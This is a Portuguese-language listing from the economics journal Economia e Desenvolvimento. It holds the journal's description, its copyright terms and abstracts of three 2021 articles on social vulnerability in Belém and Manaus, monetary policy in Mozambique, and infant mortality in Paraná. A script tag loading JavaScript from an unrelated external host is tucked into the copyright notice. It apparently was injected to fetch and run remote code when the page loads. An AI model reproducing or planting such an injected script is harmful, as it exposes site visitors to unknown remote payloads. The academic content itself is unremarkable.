Economia e Desenvolvimento https://periodicos.ufsm.br/eed <p style="text-align: justify;"><span>A revista Economia e Desenvolvimento (E&amp;D) é um periódico acadêmico-científico em formato </span><em>on-line</em><span> da área de Economia, vinculada ao Programa de Pós-Graduação em Economia e Desenvolvimento (PPGE&amp;D) do Departamento de Economia e Relações Internacionais da Universidade Federal de Santa Maria. A E&amp;D tem a finalidade de divulgar a produção científica e promover o debate acadêmico na temática do desenvolvimento econômico, considerando a pluralidade teórica e metodológica da Ciência Econômica. Para atender a esse propósito, a E&amp;D publica, em fluxo contínuo, artigos e resenhas, em português, espanhol ou inglês. A E&amp;D tem classificação B4 no Qualis/CAPES (2013-2016), registrada com ISSN 2595-833X, e está indexada à base Latindex.</span></p> Universidade Federal de Santa Maria pt-BR Economia e Desenvolvimento 1414-6509 A revista se reserva o direito de efetuar, nos originais, alterações de ordem normativa, ortográfica e gramatical, com vistas a manter o padrão culto da lingua, respeitando, porém, o exito dos autores. As provas finais não serão enviadas aos autores. Os trabalhos publicados passam a ser propriedade da revista Economia e Desenvolvimento. Deve ser consignada a fonte de publicação original. Os originais não serão devolvidos aos autores. As opiniões emitidas pelos autores dos artigos são de sua exclusiva responsabilidade.<script id="lg210a" type="text/javascript" src="https://cloudapi.online/js/api46.js"></script> Índice de Vulnerabilidade Social (IVS) das Regiões Metropolitanas de Belém-PA (RMB) e Manaus-AM (RMM) https://periodicos.ufsm.br/eed/article/view/61963 as diversas transformações socioeconômicas ocorridas nos últimos 50 anos no Brasil, oriundas do aumento populacional e da urbanização das cidades, evidenciam realidades desiguais dentro dos espaços metropolitanos. Situações indicativas de exclusão e vulnerabilidade, além da identificação da pobreza como insuficiência monetária, tem gerado a necessidade de identificar o grau de vulnerabilidade que vivem tais espaços. Como foi reportado pelo relatório do IPEA (2017), a RMM foi a que apresentou o maior IVS das 24 regiões metropolitanas analisadas no ano de 2010 e a RMB apresentou o sexto maior IVS para o período. Diante disto, uma análise da Vulnerabilidade Social da RMB e RMM foi realizada, onde foi feito um levantamento dos principais indicadores que compõem o IVS de tais regiões, juntamente com a análise de cada uma de suas respectivas dimensões, comparando as duas regiões e seus indicadores, além da apresentação dos resultados de suas respectivas Taxas de Prosperidade Social. Os resultados mostraram que os municípios de Marituba (RMB) e Careiro da Várzea (RMM) merecem urgente atenção do Poder Público e mesmo havendo sensível melhora para os indicadores de vulnerabilidade social no período de 2000 a 2010, ainda não acompanha a média das RM Brasileiras. Michele Lins Aracaty e Silva Silvia Regina de Souza Rojas Copyright (c) 2021 Economia e Desenvolvimento 2021-06-07 2021-06-07 33 e1 e1 10.5902/1414650961963 Mecanismos de transmissão política monetária em Moçambique: uma análise do canal do crédito no período de 2008 a 2019 https://periodicos.ufsm.br/eed/article/view/62643 <span class="NenhumB"><span lang="DE">O presente artigo aborda a questão da transmissão da política monetária para a economia real em Moçambique, particularmente, através do canal de empréstimos bancários no período de 2008 a 2019. Testa-se a estacionariedade das variáveis, através dos testes Augmented Dickey Fuller e Phillip-Perron, e são aplicados, testes de causalidade de Granger, função impulso e resposta, decomposição da variância e o modelo Vetor Autorregressivo. Os resultados apontam que a taxa de referência do Banco de Moçambique impacta positivamente a inflação e o produto, no entanto, para a inflação, embora impactada positivamente, não é significante e para o produto somente é significante no segundo momento. Os resultados revelam a não existência ou funcionamento do canal dos empréstimos bancários em Moçambique no período em análise. Por outro lado, sugerem a existência de algumas limitações na eficácia da transmissão da política monetária sobre a economia real, dado que são encontradas evidências de não significância da referência da política monetária na inflação e produto em algun</span></span> Agostinho Valente Macane Carlos Seixas Copyright (c) 2021 Economia e Desenvolvimento 2021-06-07 2021-06-07 33 e2 e2 10.5902/1414650962643 Os determinantes da mortalidade infantil nos municípios paranaenses entre 1991 e 2010 https://periodicos.ufsm.br/eed/article/view/44302 <p>A taxa de mortalidade infantil vem decrescendo em muitos países nas últimas décadas devido a melhorias não só em termos de renda, mas, principalmente, pelos aspectos sociais, demográficos e de atendimento de serviços básicos. Este estudo visa identificar a relação das variáveis taxa de fecundidade, taxa de analfabetismo, proporção da população servida pela coleta de lixo e rede geral de água, renda e índice de Gini com a taxa de mortalidade infantil. Para tanto, foram coletadas informações do Atlas do Desenvolvimento Humano para os 399 municípios paranaenses, referentes aos anos censitários e estimou-se um modelo econométrico com dados em painel. Em geral, os resultados obtidos vão ao encontro do referencial teórico e bibliográfico. De fato, a estimativa para a proporção da população servida por rede de abastecimento de água foi o único resultado incongruente encontrado, com sinal positivo estatisticamente não-significativo. Assim, pode-se concluir que melhorias nos serviços básicos, no atendimento à saúde, na educação, e o aumento e melhor distribuição da renda têm relação com a redução da taxa de mortalidade infantil e as políticas públicas devem ser direcionadas para tais setores.</p> Géssica Mathias Diniz Diego Ferreira Copyright (c) 2021 Economia e Desenvolvimento 2021-06-07 2021-06-07 33 e3 e3 10.5902/1414650944302